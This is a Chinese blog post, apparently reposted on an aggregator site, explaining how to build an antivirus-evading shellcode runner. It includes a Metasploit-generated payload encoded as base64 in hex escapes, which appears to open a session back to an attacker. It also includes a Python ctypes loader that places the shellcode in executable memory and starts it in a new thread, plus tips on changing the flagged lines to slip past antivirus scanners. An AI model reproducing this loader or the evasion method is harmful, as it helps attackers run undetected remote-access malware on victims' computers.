缺点:
编译成exe以后体积过大
实现:
msf生成shellcode代码:
将payload给copy下来,去除引号。
x2fx4fx69x43x41x41x41x41x59x49x6ex6cx4dx63x42 x6bx69x31x41x77x69x31x49x4dx69x31x49x55x69x33 x49x6fx44x37x64x4bx4ax6ax48x2fx72x44x78x68x66 x41x49x73x49x4dx48x50x44x51x48x48x34x76x4ax53 x56x34x74x53x45x49x74x4bx50x49x74x4dx45x58x6a x6ax53x41x48x52x55x59x74x5ax49x41x48x54x69x30 x6bx59x34x7ax70x4ax69x7ax53x4cx41x64x59x78x2f x36x7ax42x7ax77x30x42x78x7ax6ax67x64x66x59x44 x66x66x67x37x66x53x52x31x35x46x69x4cx57x43x51 x42x30x32x61x4cx44x45x75x4cx57x42x77x42x30x34 x73x45x69x77x48x51x69x55x51x6bx4ax46x74x62x59 x56x6cx61x55x66x2fx67x58x31x39x61x69x78x4cx72 x6ax56x31x6fx4dx7ax49x41x41x47x68x33x63x7ax4a x66x56x47x68x4dx64x79x59x48x69x65x6ax2fx30x4c x69x51x41x51x41x41x4bx63x52x55x55x47x67x70x67 x47x73x41x2fx39x56x71x43x6dx6ax41x71x41x4dx38 x61x41x49x41x44x51x57x4ax35x6cx42x51x55x46x42 x41x55x45x42x51x61x4fx6fx50x33x2bx44x2fx31x5a x64x71x45x46x5ax58x61x4ax6dx6cx64x47x48x2fx31 x59x58x41x64x41x72x2fx54x67x68x31x37x4fx68x6e x41x41x41x41x61x67x42x71x42x46x5ax58x61x41x4c x5ax79x46x2fx2fx31x59x50x34x41x48x34x32x69x7a x5ax71x51x47x67x41x45x41x41x41x56x6dx6fx41x61 x46x69x6bx55x2bx58x2fx31x5ax4ex54x61x67x42x57 x55x31x64x6fx41x74x6ex49x58x2fx2fx56x67x2fx67 x41x66x53x68x59x61x41x42x41x41x41x42x71x41x46 x42x6fx43x79x38x50x4dx50x2fx56x56x32x68x31x62 x6bx31x68x2fx39x56x65x58x76x38x4dx4ax41x2bx46 x63x50x2fx2fx2fx2bx6dx62x2fx2fx2fx2fx41x63x4d x70x78x6ex58x42x77x37x76x77x74x61x4ax57x61x67 x42x54x2fx39x55x3d
将自己的代码放入第3行的shell_code位置。
import ctypes,base64 encode_shellcode = "shell_code" shellcode = base64.b64decode(encode_shellcode) rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。
返回session:
免杀效果:
参考资料:
https://github.com/TideSec/BypassAntiVirus
https://micro8.gitbook.io/micro8/
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持考高分网。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)